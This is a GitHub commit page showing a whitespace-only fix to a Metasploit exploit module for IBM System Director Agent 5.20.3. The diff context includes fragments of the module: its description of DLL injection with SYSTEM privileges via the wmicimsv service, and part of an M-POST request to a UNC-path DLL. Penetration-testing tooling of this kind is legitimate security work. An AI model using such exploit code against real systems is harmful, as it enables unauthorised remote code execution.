Skip to content

Commit 0ea5c78

Browse files
committed
Tabs and spaces don't mix
1 parent 37f9cff commit 0ea5c78

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

modules/exploits/windows/misc/ibm_director_cim_dllinject.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
1616

1717
def initialize
1818
super(
19-
'Name' => 'IBM System Director Agent DLL Injection',
19+
'Name' => 'IBM System Director Agent DLL Injection',
2020
'Description' => %q{
2121
This module abuses the "wmicimsv" service on IBM System Director Agent 5.20.3
2222
to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM
@@ -44,7 +44,7 @@ def initialize
4444
],
4545
'Targets' =>
4646
[
47-
[ 'IBM System Director Agent 5.20.3 / Windows with WebClient enabled', { } ],
47+
[ 'IBM System Director Agent 5.20.3 / Windows with WebClient enabled', { } ]
4848
],
4949
'DefaultTarget' => 0,
5050
'Privileged' => true,
@@ -299,7 +299,7 @@ def primer
299299
'uri' => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll",
300300
'method' => 'M-POST',
301301
'ctype' => 'application/xml; charset=utf-8',
302-
'headers' => {
302+
'headers' => {
303303
"Man" => "http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40",
304304
"CIMOperation" => "MethodCall",
305305
"CIMExport" => "MethodRequest",

0 commit comments

Comments
 (0)